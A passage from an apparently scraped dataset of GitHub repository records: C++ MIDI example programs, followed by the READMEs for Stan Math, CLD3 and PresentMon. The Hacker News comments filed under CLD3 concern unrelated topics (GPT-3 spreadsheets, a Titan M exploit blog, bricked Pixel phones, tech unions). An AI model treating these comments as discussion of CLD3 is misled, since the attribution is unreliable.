0)) break;\n storage.push_back(tickbend);\n phase += increment;\n if (phase > twopi) phase -= twopi;\n }\n int track = midifile.getTrackCount() - 1;\n for (int i=0; i<(int)storage.size(); i++)\n midifile.addPitchBend(track, storage[i].first, channel, storage[i].second);\n if (filename.empty()) cout << midifile;\n else midifile.write(filename);\n return 0;\n}\n```\n\n\n### Polyrhythm generator ###\n\nHere is a program that generates polyrhythm patterns. Command line\noptions are:\n\n| option | default value | meaning |\n|:--------:|:-------------:|:------------------------------------------:|\n| `-a` | 2 | first instrument's division of the cycle |\n| `-b` | 3 | first instrument's division of the cycle |\n| `-c` | 10 | number of cycles |\n| `-d` | 2.0 | duration of each cycle |\n| `--key1` | 76 | percussion key number for first instrument |\n| `--key2` | 77 | percussion key number for first instrument |\n| `-o` | | output filename |\n\n\n```cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include \n#include \n#include \nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"a=i:2\", \"cycle division 1\");\n options.define(\"b=i:3\", \"cycle division 2\");\n options.define(\"c|cycle=i:10\", \"cycle count\");\n options.define(\"d|dur=d:2.0\", \"duration of cycle in seconds\");\n options.define(\"key1=i:76\", \"first percussion key number\");\n options.define(\"key2=i:77\", \"second percussion key number\");\n options.define(\"o|output-file=s\", \"output filename\");\n options.process(argc, argv);\n\n int a = options.getInteger(\"a\");\n int b = options.getInteger(\"b\");\n int c = options.getInteger(\"cycle\");\n int key1 = options.getInteger(\"key1\");\n int key2 = options.getInteger(\"key2\");\n double dur = options.getDouble(\"dur\");\n double tempo = 60.0 / dur;\n\n MidiFile midifile;\n midifile.setTPQ(a*b);\n midifile.addTempo(0, 0, tempo);\n midifile.addTracks(2);\n for (int i=0; i\n\nThe Stan Math Library is a C++, reverse-mode automatic\ndifferentiation library designed to be usable, extensive and\nextensible, efficient, scalable, stable, portable, and redistributable\nin order to facilitate the construction and utilization of algorithms\nthat utilize derivatives.\n\n\nDocumentation, Installation, and Examples\n--------------\n\nAll of Stan math's documentation is hosted on our website below. Please do not\nreference articles in the wiki as they are outdated and not maintained.\n\n[mc-stan.org/math](https://mc-stan.org/math/)\n\n\nLicensing\n---------\nThe Stan Math Library is licensed under the [new BSD\nlicense](https://github.com/stan-dev/math/blob/develop/LICENSE%2Emd).\n\nThe Stan Math Library depends on the Intel TBB library which is\nlicensed under the Apache 2.0 license. This dependency implies an\nadditional restriction as compared to the new BSD license alone. The\nApache 2.0 license is incompatible with GPL-2 licensed code if\ndistributed as a unitary binary. You may refer to the Licensing page on the [Stan wiki](https://github.com/stan-dev/stan/wiki/Stan-Licensing).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "google/cld3", "link": "https://github.com/google/cld3", "tags": [], "stars": 633, "description": null, "lang": "C++", "repo_lang": "", "readme": "# Compact Language Detector v3 (CLD3)\n\n* [Model](#model)\n* [Supported Languages](#supported-languages)\n* [Installation](#installation)\n* [Bugs and Feature Requests](#bugs-and-feature-requests)\n* [Credits](#credits)\n\n### Model\n\nCLD3 is a neural network model for language identification. This package\n contains the inference code and a trained model. The inference code\n extracts character ngrams from the input text and computes the fraction\n of times each of them appears. For example, as shown in the figure below,\n if the input text is \"banana\", then one of the extracted trigrams is \"ana\"\n and the corresponding fraction is 2/4. The ngrams are hashed down to an id\n within a small range, and each id is represented by a dense embedding vector\n estimated during training.\n\nThe model averages the embeddings corresponding to each ngram type according\n to the fractions, and the averaged embeddings are concatenated to produce\n the embedding layer. The remaining components of the network are a hidden\n (Rectified linear) layer and a softmax layer.\n\nTo get a language prediction for the input text, we simply perform a forward\n pass through the network.\n\n![Figure](model.png \"CLD3\")\n\n### Supported Languages\n\nThe model outputs BCP-47-style language codes, shown in the table below. For\nsome languages, output is differentiated by script. Language and script names\nfrom\n[Unicode CLDR](https://github.com/unicode-cldr/cldr-localenames-modern/blob/master/main/en).\n\nOutput Code | Language Name | Script Name\n----------- | --------------- | ------------------------------------------\naf | Afrikaans | Latin\nam | Amharic | Ethiopic\nar | Arabic | Arabic\nbg | Bulgarian | Cyrillic\nbg-Latn | Bulgarian | Latin\nbn | Bangla | Bangla\nbs | Bosnian | Latin\nca | Catalan | Latin\nceb | Cebuano | Latin\nco | Corsican | Latin\ncs | Czech | Latin\ncy | Welsh | Latin\nda | Danish | Latin\nde | German | Latin\nel | Greek | Greek\nel-Latn | Greek | Latin\nen | English | Latin\neo | Esperanto | Latin\nes | Spanish | Latin\net | Estonian | Latin\neu | Basque | Latin\nfa | Persian | Arabic\nfi | Finnish | Latin\nfil | Filipino | Latin\nfr | French | Latin\nfy | Western Frisian | Latin\nga | Irish | Latin\ngd | Scottish Gaelic | Latin\ngl | Galician | Latin\ngu | Gujarati | Gujarati\nha | Hausa | Latin\nhaw | Hawaiian | Latin\nhi | Hindi | Devanagari\nhi-Latn | Hindi | Latin\nhmn | Hmong | Latin\nhr | Croatian | Latin\nht | Haitian Creole | Latin\nhu | Hungarian | Latin\nhy | Armenian | Armenian\nid | Indonesian | Latin\nig | Igbo | Latin\nis | Icelandic | Latin\nit | Italian | Latin\niw | Hebrew | Hebrew\nja | Japanese | Japanese\nja-Latn | Japanese | Latin\njv | Javanese | Latin\nka | Georgian | Georgian\nkk | Kazakh | Cyrillic\nkm | Khmer | Khmer\nkn | Kannada | Kannada\nko | Korean | Korean\nku | Kurdish | Latin\nky | Kyrgyz | Cyrillic\nla | Latin | Latin\nlb | Luxembourgish | Latin\nlo | Lao | Lao\nlt | Lithuanian | Latin\nlv | Latvian | Latin\nmg | Malagasy | Latin\nmi | Maori | Latin\nmk | Macedonian | Cyrillic\nml | Malayalam | Malayalam\nmn | Mongolian | Cyrillic\nmr | Marathi | Devanagari\nms | Malay | Latin\nmt | Maltese | Latin\nmy | Burmese | Myanmar\nne | Nepali | Devanagari\nnl | Dutch | Latin\nno | Norwegian | Latin\nny | Nyanja | Latin\npa | Punjabi | Gurmukhi\npl | Polish | Latin\nps | Pashto | Arabic\npt | Portuguese | Latin\nro | Romanian | Latin\nru | Russian | Cyrillic\nru-Latn | Russian | English\nsd | Sindhi | Arabic\nsi | Sinhala | Sinhala\nsk | Slovak | Latin\nsl | Slovenian | Latin\nsm | Samoan | Latin\nsn | Shona | Latin\nso | Somali | Latin\nsq | Albanian | Latin\nsr | Serbian | Cyrillic\nst | Southern Sotho | Latin\nsu | Sundanese | Latin\nsv | Swedish | Latin\nsw | Swahili | Latin\nta | Tamil | Tamil\nte | Telugu | Telugu\ntg | Tajik | Cyrillic\nth | Thai | Thai\ntr | Turkish | Latin\nuk | Ukrainian | Cyrillic\nur | Urdu | Arabic\nuz | Uzbek | Latin\nvi | Vietnamese | Latin\nxh | Xhosa | Latin\nyi | Yiddish | Hebrew\nyo | Yoruba | Latin\nzh | Chinese | Han (including Simplified and Traditional)\nzh-Latn | Chinese | Latin\nzu | Zulu | Latin\n\n### Installation\nCLD3 is designed to run in the Chrome browser, so it relies on code in\n[Chromium](http://www.chromium.org/).\nThe steps for building and running the demo of the language detection model are:\n\n- [check out](http://www.chromium.org/developers/how-tos/get-the-code) the\n Chromium repository.\n- copy the code to `//third_party/cld_3`\n- Uncomment `language_identifier_main` executable in `src/BUILD.gn`.\n- build and run the model using the commands:\n\n```shell\ngn gen out/Default\nninja -C out/Default third_party/cld_3/src/src:language_identifier_main\nout/Default/language_identifier_main\n```\n### Bugs and Feature Requests\n\nOpen a [GitHub issue](https://github.com/google/cld3/issues) for this repository to file bugs and feature requests.\n\n### Announcements and Discussion\n\nFor announcements regarding major updates as well as general discussion list, please subscribe to:\n[cld3-users@googlegroups.com](https://groups.google.com/forum/#!forum/cld3-users)\n\n### Credits\n\nOriginal authors of the code in this package include (in alphabetical order):\n\n* Alex Salcianu\n* Andy Golding\n* Anton Bakalov\n* Chris Alberti\n* Daniel Andor\n* David Weiss\n* Emily Pitler\n* Greg Coppola\n* Jason Riesa\n* Kuzman Ganchev\n* Michael Ringgaard\n* Nan Hua\n* Ryan McDonald\n* Slav Petrov\n* Stefan Istrate\n* Terry Koo\n", "readme_type": "markdown", "hn_comments": "GPT-3 is a very smart tool, using it on top of Excel and Sheets should help save time.This article talks about using GPT-3 (using my AI tool) to do your routine tasks on Google Sheets and Excel. Such as extracting data, finding duplicates and so on.I am open to feedback.As an aside, this was published last week, Imagine how much they could of done if they didn't have to do blackbox fuzzing, and how many holes in the device would of been closed.\"Attacking Titan M with Only One Byte\" [0]> ...Titan M, a security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3. In this blog post, ...we show how we found this vulnerability, using emulation-based fuzzing with AFL++ in Unicorn mode. Then, we go over the exploitation and its inherent challenges, that eventually led us to obtain code execution on the chip.[0] https://blog.quarkslab.com/attacking-titan-m-with-only-one-b...I'm curious if this is a legally binding promise in any major jurisdiction.E.g., can someone on the U.S. sue Google for specific performance to uphold that promise?I'm not talking about suing for monetary compensation, or accepting an out-of-court settlement. I'm talking, full-strength, possibly precedence-setting, fulfillment of that promise in federal court?I would so contribute to a legal fund for that, especially with the stipulation that my money must be returned if an out-of-court settlement were reached.Only viewable signed in..Whoever wrote that blog post has probably long since moved on to other things....I\u2019m convinced that any project named Titan will fail to ship (or fail immediately after shipping, as in the most famous instance). Apple\u2019s car project was Titan, Facebook\u2019s gmail killer was Project Titan, I think Activision Blizard had a Titan. Google has this, but I don\u2019t even think it\u2019s their first Titan to not ship, I\u2019m blanking on the other. (Edit: Google\u2019s defunct internet drone project was Titan)- My phone is bricked...- Please go to Settings...that was hilarious :)Huhn. My wife's Pixel 3 broke just days before the 5a was released (this happened just a few weeks ago). Her LTE radio seemed to be having problems. It wouldn't connect to the cell tower, even after a factory reset. Sometimes, removing the SIM card and reinserting it would cause the phone to magically start working, but it quickly would lose it's connection again. We tried different SIMs, and finally it was totally dead and she used my old iPhone 6 for a few days while we waited for the 5a to arrive.I will buy a Google made phone for Development purposes since they get updates fast but as far as everyday use? Never again. My Nexus 6P bricked just because I forgot to charge it and it went down to 0. And when I did my research online about the problem it was a known issue. That made me furious. It made me move over to a Samsung Galaxy which I love. I can't believe this is still an issue with them.If this was about iPhones this would have 999 comments and 10 times as many upvotes, but any other brand and people are like oh no, anyway.Crap.I\u2019m now considering buying a new Pixel phone - I need to switch from iPhone to Android for certain reasons, and I hate pre-installed crap of Samsung. (Samsung Internet? Really?)But I also don\u2019t want to deal with HW issues and my family never had any HW problems with Samsung\u2026 so I guess Samsung it is?I recently has a pixel 2 die on me in a similar sounding way. Was working perfectly fine and then suddenly it won't turn on and won't take a charge. Tested with one of those usb tester things and it shows 0amp being drawn.I liked this exchange Case ID [9-2313000031523]\n Me: I am also recording this conversation\n Support: We do not allow you to record\n Me: So you can record, but I can't?\n Support: That is correct.\n\nI'm pretty sure that, in the US, even in \"2 party consent\" states, once both parties are aware the call is / may be recorded, you're on solid ground. As such, if the Google end says \"this call may be recorded\", you can record. (IANAL, etc... just my understanding)Unfortunately there is a sign-in wall to this content.Phones are stuck in EDL mode with no way to recover, due to Google not releasing the signed firehorse files.https://issuetracker.google.com/issues/192008282https://www.google.de/search?q=pixel+3+brick&tbm=nwsI am not affected (yet). If anyone from Germany is interested in figuring out what the issue is and can risk losing their data, feel free to ping me on libera IRC. I have the ability to desolder and dump the UFS memory to start some investigation.I can\u2019t believe they inflict buganizer on the innocent public.I've had similar issues with all Pixel phones I've got too :(I do like the fact that nothing fancy gets installed on the phone (unlike Samsung, the rest), but my Samsung N9 Note has been working for 2-3 years no issues! (yes, I don't like the crap that they add, but got used to it... by ignoring it)Huh my Pixel 3 XL also just died in a very similar way the battery was starting to lose charge faster than expected and a few nights ago it died again and then wouldn't power on. It was taking charge, I plugged it into a powerbank with a wattage meter, and it was pulling just 5W over USBC. (The powerbank supports full PD) It's probably the wrong spot to report this sadly so it's probably been muted it seems like a hardware issue not an issue with Android itself.I really loved my nexus 5 phone from Google until it got stuck in a bootloop and wouldn't charge. It was a a couple weeks out of warranty but they were nice enough to send me another one (with a charge hold) that almost immediately became a brick as well with the same issue and that one they would not replace.It kind of sucks to see that this is still an ongoing issue on their newer and (much) more expensive phones. I've already sworn off getting another device from Google and this just reinforces this point. Samsung's hardware (with uh, one Note-able exception) has been solid and while it didn't get the same updates and of course had all the nonsense that Samsung added on top of the base android experience, was much better than any other Android device I've owned.That said, the iPhone 4s I owned and the iPhone Xs Max I currently own are the two best phones I've owned and it's really not close. Of course it's frustrating dealing with the limitations of the OS and man would I love to sideload some of the great applications they have on Android, but the reliability and support are just unparalleled, not to mention iOS just kind of gets a lot of basic things right which makes it a much more enjoyable experience without tinkering.Pixel 3 is EOL anyways as of October 2021. No more software updates and no security patch. Makes sense the hardware is EOL as well.Meanwhile an iPhone SE from 2016 can upgrade to the latest iOS. It just works.Especially with the Pixel lineup, there is a historical quality control issue with Google's phones that I'm worried hasn't been solved yet. I owned:- Pixel 3: Past few months, volume buttons and power buttons gradually stopped working. USB port works for charging, but when connected to a computer, port connects and disconnects in an infinite loop. Bluetooth connection with car always skips/stutters during Maps usage even though iPhones and other Android devices work fine.- Pixel: Camera stopped working- Nexus 5X: Infinite boot loop issue, contacted Google and replaced it using warranty- Nexus 4: No hardware issues- Nexus One: No hardware issuesThe Nexus phones were less problematic. I suspect it's because they were co-designed/manufactured by LG.As time goes on, I use my phone less, not more, and I haven't dropped Pixel phones, unlike the Nexus ones.I'm wary of purchasing the Pixel 3a, 4, or 5 since I don't want to be burned a 3rd time by specifically Google-designed phones. I think it would be best to avoid Android OS updates as much as possible as well.I'm looking for the next smartphone to be modular. Heavily considering a Linux phone easier to DIY repair.The Advanced Hardware Support Team are currently requesting only for phones that are in EDL mode. While the issue tracker has become a graveyard for phones, the particular focus of the engineers are Pixel 3/3 XL phones entering EDL after an OTA update.If you have had this problem, please star the issue ticket and add a comment about your circumstances.Some technical explanation about EDL mode is couple pages into the xda-dev forum thread:\nhttps://forum.xda-developers.com/t/fix-pixel-3-qusb_bulk_cid...A reddit post that lists just about all the reddit posts at the time on this topic:\nhttps://www.reddit.com/r/GooglePixel/comments/ongj1j/a_remin...Some additional news stories on this:https://9to5google.com/2021/09/01/some-pixel-3-devices-are-g...https://www.androidpolice.com/phones-devices/google-phones-d...https://www.phonearena.com/news/pixel-3-and-pixel-3-xl-model...https://www.extremetech.com/mobile/326636-something-is-brick...https://slashdot.org/story/21/09/03/019201/pixel-3-and-3-xl-...I have no idea what EDL mode is but some googling led me to an open source utility [1] called \"Sahara.\" I wonder if you could use it for recovery?[1] https://github.com/openpst/saharaGoogling EDL mode, apparently one way to enable it is to \"short the test points on your device\u2019s mainboard.\" Maybe Pixel 3s are getting these test points bridged by something inside the case, possibly due to e.g. thermal battery expansion pushing something against the mainboard?Just had a pixel 3a brick out of nowhere a few weeks ago after the battery diedMy Pixel 3A bricked suddenly as well. It\u2019s now just collecting dust in the cabinet, very disappointing. Meanwhile, my iPhone 6S still works but with a deteriorated battery.That mode indicates that the boot ROM failed to verify the signature on the bootloader. Generally this means that for some reason your bootloader got corrupted. The way to restore this is a special qualcomm tool, but you also need a properly formatted and signed package to flash using the tool, and i doubt that google would give it to you.How did it get corrupted? FTL issue in an aging eMMC? Bug in linux kernel block device driver? Malicious code? Sheer dumb misfortune? Who knows...good stuff. thanks for sharingThanks!Thanks for sharing, S3 is still one of the most fascinating technologies that I admireClickable links:Google Union -> https://alphabetworkersunion.org/CODE-CWA -> https://www.code-cwa.org/Problems with tech workers' working conditions are not unknown in the USA. For instance, workers can face layoffs, many people are coerced into working over 8 hours, and there are various other harmful practices. The Kickstarter union managed to limit the company's layoff policy by securing gains such as 4-months pay for laid-off workers. It also stopped Kickstarter's attempts to censor anti-racist content, such as the comic series \"Always Punch Nazis\". Meanwhile, writers for app developer Voltage Entertainment increased their wages by 78% through a strike.If a workplace's conditions don't make the workers happy for whatever reason, virtually anything can be changed by unions. They could make a tremendous impact in tech workers' lives by changing many aspects of work-life balance, which is certainly not ideal right now. There's no reason your work at your company shouldn't feel more like the enjoyable programming you do on your personal projects you are devoted to. I will answer people's questions in the comments.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "GameTechDev/PresentMon", "link": "https://github.com/GameTechDev/PresentMon", "tags": ["tool"], "stars": 633, "description": "Tool for collection and processing of ETW events related to frame presentation on Windows.", "lang": "C++", "repo_lang": "", "readme": "[![](https://img.shields.io/github/license/GameTechDev/PresentMon)]()\n[![](https://img.shields.io/github/v/release/GameTechDev/PresentMon)](https://github.com/GameTechDev/PresentMon/releases/latest)\n[![](https://img.shields.io/github/commits-since/GameTechDev/PresentMon/latest/main)]()\n[![](https://img.shields.io/github/issues/GameTechDev/PresentMon)]()\n[![](https://img.shields.io/github/last-commit/GameTechDev/PresentMon)]()\n\n# PresentMon\n\nPresentMon is a tool to capture and analyze [ETW](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968803%28v=vs.85%29.aspx?f=255&MSPPError=-2147217396) events related to swap chain presentation on Windows. It can be used to trace key performance metrics for graphics applications (e.g., CPU and Display frame durations and latencies) and works across different graphics APIs, different hardware configurations, and for both desktop and UWP applications.\n\nWhile PresentMon itself is focused on lightweight collection and analysis, there are several other programs that build on its functionality and/or helps visualize the resulting data. For example, see\n\n- [CapFrameX](https://github.com/DevTechProfile/CapFrameX)\n- [FrameView](https://www.nvidia.com/en-us/geforce/technologies/frameview/)\n- [OCAT](https://github.com/GPUOpen-Tools/OCAT)\n- [PIX](https://devblogs.microsoft.com/pix/download/) (used as part of its [system monitor UI](https://devblogs.microsoft.com/pix/system-monitor/))\n\n## License\n\nCopyright (C) 2017-2022 Intel Corporation\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n## Releases\n\nBinaries for main release versions of PresentMon are provided on GitHub:\n\n- [Latest release](https://github.com/GameTechDev/PresentMon/releases/latest)\n- [List of all releases](https://github.com/GameTechDev/PresentMon/releases)\n\nSee [CONTRIBUTING](https://github.com/GameTechDev/PresentMon/blob/main/CONTRIBUTING.md) for information on how to request features, report issues, or contribute code changes.\n\n## Command line options\n\n| Capture Target Options | |\n| ---------------------- | ---------------------------------------------------------------------------------------------------------------- |\n| `-captureall` | Record all processes (default). |\n| `-process_name name` | Record only processes with the provided exe name. This argument can be repeated to capture multiple processes. |\n| `-exclude name` | Don't record processes with the provided exe name. This argument can be repeated to exclude multiple processes. |\n| `-process_id id` | Record only the process specified by ID. |\n| `-etl_file path` | Consume events from an ETW log file instead of running processes. |\n\n| Output Options | |\n| ------------------- | ------------------------------------------------------------------------ |\n| `-output_file path` | Write CSV output to the provided path. |\n| `-output_stdout` | Write CSV output to STDOUT. |\n| `-multi_csv` | Create a separate CSV file for each captured process. |\n| `-no_csv` | Do not create any output file. |\n| `-no_top` | Don't display active swap chains in the console |\n| `-qpc_time` | Output present time as a performance counter value. |\n| `-qpc_time_s` | Output present time as a performance counter value converted to seconds. |\n\n| Recording Options | |\n| ------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- |\n| `-hotkey key` | Use provided key to start and stop recording, writing to a unique CSV file each time. 'key' is of the form MODIFIER+KEY, e.g., \"alt+shift+f11\". |\n| `-delay seconds` | Wait for provided time before starting to record. If using -hotkey, the delay occurs each time recording is started. |\n| `-timed seconds` | Stop recording after the provided amount of time. |\n| `-exclude_dropped` | Exclude dropped presents from the csv output. |\n| `-scroll_indicator` | Enable scroll lock while recording. |\n| `-no_track_display` | Disable tracking through GPU and display. |\n| `-track_debug` | Adds additional data to output not relevant to normal usage. |\n\n| Execution Options | |\n| ------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| `-session_name name` | Use the provided name to start a new realtime ETW session, instead of the default \"PresentMon\". This can be used to start multiple realtime captures at the same time (using distinct, case-insensitive names). A realtime PresentMon capture cannot start if there are any existing sessions with the same name. |\n| `-stop_existing_session` | If a trace session with the same name is already running, stop the existing session (to allow this one to proceed). |\n| `-terminate_existing` | Terminate any existing PresentMon realtime trace sessions, then exit. Use with `-session_name` to target particular sessions. |\n| `-restart_as_admin` | If not running with elevated privilege, restart and request to be run as administrator. (See discussion above). |\n| `-terminate_on_proc_exit` | Terminate PresentMon when all the target processes have exited. |\n| `-terminate_after_timed` | When using `-timed`, terminate PresentMon after the timed capture completes. |\n\n| Beta Options | |\n| ---------------------- | -------------------------------------------------------------------- |\n| `-track_mixed_reality` | Capture Windows Mixed Reality data to a CSV file with \"_WMR\" suffix. |\n\n## Comma-separated value (CSV) file output\n\n### CSV file names\n\nBy default, PresentMon creates a CSV file named \"PresentMon-\\